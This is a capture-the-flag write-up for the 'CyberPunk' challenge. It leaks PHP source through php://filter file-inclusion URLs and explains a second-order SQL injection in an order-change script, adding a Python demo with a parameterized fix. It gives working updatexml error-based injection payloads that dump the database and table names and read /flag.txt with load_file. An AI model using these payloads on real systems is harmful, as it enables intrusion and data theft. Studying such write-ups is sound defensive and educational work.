[North China Region] CyberPunk

Looking at the page source reveals a file inclusion, so pull the source files down with it:

/?file=php://filter/read=convert.base64-encode/resource=index.php
/?file=php://filter/read=convert.base64-encode/resource=search.php
/?file=php://filter/read=convert.base64-encode/resource=change.php
/?file=php://filter/read=convert.base64-encode/resource=delete.php

Auditing the code, the key query only applies strict filtering to the user name and phone number and skips any check on the address.

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    // Keyword blacklist applied to user_name and phone only
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    // The address is only escaped, and only at the moment it is submitted
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        // $row['address'] is the value stored by the previous request, read back unescaped
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];

Here `'old_address'='".$row['address']."'` uses the address saved by the earlier request: it was escaped with addslashes() when it was first submitted, but once it is read back from the database it is spliced into the new query as-is, which allows malicious concatenation.
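To show the same second-order problem end to end, here is an added example (not code from the challenge) that models change.php in Python over an in-memory SQLite table: the first request's address is escaped and stored, the second request splices the stored copy back in raw, and a parameterized version handles both. Table contents, names and the `escape_quotes` stand-in for addslashes() are constructed for the demo.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge's MySQL `user` table.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (user_id INTEGER PRIMARY KEY, user_name TEXT, "
               "phone TEXT, address TEXT, old_address TEXT)")
    db.execute("INSERT INTO user VALUES (1, 'alice', '13800000000', 'original street', '')")
    return db

def escape_quotes(s: str) -> str:
    """Stand-in for PHP addslashes(): protects only the query the value is put
    into right now (SQLite doubles quotes where MySQL backslash-escapes them)."""
    return s.replace("'", "''")

def lookup(db, user_name, phone):
    # The original looks the row up by user_name/phone; that query is not the
    # point here, so it is bound with parameters.
    return db.execute("SELECT user_id, address FROM user WHERE user_name=? AND phone=?",
                      (user_name, phone)).fetchone()

def change_address_vulnerable(db, user_name, phone, new_address):
    # Mirrors change.php: the new address is escaped, but the stored address
    # comes back from the database with its quote intact and is spliced in raw.
    user_id, old_address = lookup(db, user_name, phone)
    sql = (f"UPDATE user SET address='{escape_quotes(new_address)}', "
           f"old_address='{old_address}' WHERE user_id={user_id}")
    db.execute(sql)
    return sql

def change_address_safe(db, user_name, phone, new_address):
    # Fix: bind every value, whether it came from the request or from a stored row.
    user_id, old_address = lookup(db, user_name, phone)
    db.execute("UPDATE user SET address=?, old_address=? WHERE user_id=?",
               (new_address, old_address, user_id))

def run_demo(handler):
    """Two consecutive change requests. Returns (address stored after the first,
    outcome of the second: the final (address, old_address) row or an error string)."""
    db = make_db()
    handler(db, "alice", "13800000000", "5 O'Connell St")   # request 1: quote escaped, write succeeds
    stored = db.execute("SELECT address FROM user WHERE user_id=1").fetchone()[0]
    try:
        handler(db, "alice", "13800000000", "6 Main St")     # request 2: stored quote reaches the query
        outcome = db.execute("SELECT address, old_address FROM user WHERE user_id=1").fetchone()
    except sqlite3.OperationalError as exc:
        outcome = "query broken: " + str(exc)
    return stored, outcome

if __name__ == "__main__":
    print(run_demo(change_address_vulnerable))
    print(run_demo(change_address_safe))
```

An ordinary apostrophe is enough to show the issue: the vulnerable handler's second UPDATE fails because the stored quote now sits inside SQL text, while the parameterized handler completes both requests.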

Write the following into the address field to dump the database name:

1' where user_id=updatexml(1,concat(0x7e,(select substr(database(),1,20)),0x7e),1)#

Dump the table names:

1' where user_id=updatexml(1,concat(0x7e,(select substr(table_name,1,20)from information_schema.tables where table_schema='ctfusers'),0x7e),1)#

After that nothing more could be dumped; checking the writeup, it turns out you only need to read the file.

Finally, reading the file gave the result:

1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)#
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),20,50)),0x7e),1)#
